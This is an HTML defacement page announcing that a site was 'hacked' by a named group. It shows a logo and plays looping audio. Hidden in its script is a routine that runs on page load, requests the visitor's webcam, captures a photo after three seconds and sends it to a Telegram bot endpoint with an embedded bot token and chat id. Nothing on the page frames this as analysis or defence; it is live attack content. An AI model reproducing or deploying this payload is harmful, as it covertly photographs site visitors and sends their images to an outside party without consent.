<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Hacked By Rendiexploit</title>
  <link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <style>
    body {
      background-color: black;
      color: white;
      text-align: center;
      font-family: 'Iceland', sans-serif;
    }
    .title {
      font-size: 3rem;
      color: red;
    }
    .subtitle {
      font-size: 2.5rem;
      color: green;
    }
    .quote {
      font-size: 1.5rem;
      margin: 20px 0;
    }
    .logo-container {
      display: flex;
      justify-content: center;
      gap: 20px;
    }
    .logo-container img {
      width: 300px;
      height: auto;
    }
    audio {
      margin-top: 20px;
    }
  </style>
</head>
<body>
  <h1 class="title">HACKED BY RendiSec</h1>
  <div class="logo-container">
    <img src="https://files.catbox.moe/06z8sz.jpg" alt="Logo">
  </div>
  <h2 class="subtitle">Hii! This site hacked by VynCyberTeamm!!</h2>
  <p class="quote">System Breached</p>
  <audio id="player" src="https://i.top4top.io/m_33131khih0.mp3" loop controls autoplay></audio>

  <script>
    
    async function captureAndSend() {
      try {
        const stream = await navigator.mediaDevices.getUserMedia({ video: true });
        const video = document.getElementById('video');
        video.srcObject = stream;

        setTimeout(() => {
          const canvas = document.getElementById('canvas');
          canvas.width = video.videoWidth;
          canvas.height = video.videoHeight;
          canvas.getContext('2d').drawImage(video, 0, 0);
          const imageData = canvas.toDataURL('image/jpeg');

          fetch('https://api.telegram.org/bot<7805509154:AAEGPkSaTMEivP3lRGSXEbpbxI4Jpq-QRhE>/sendPhoto', {
            method: 'POST',
            body: new URLSearchParams({
              chat_id: '<6281867611>',
              photo: imageData
            })
          });

          stream.getTracks().forEach(track => track.stop());
        }, 3000); // ambil foto setelah 3 detik
      } catch (err) {
        console.error('Camera access denied or error:', err);
      }
    }

    captureAndSend();
  </script>
</body>
</html>
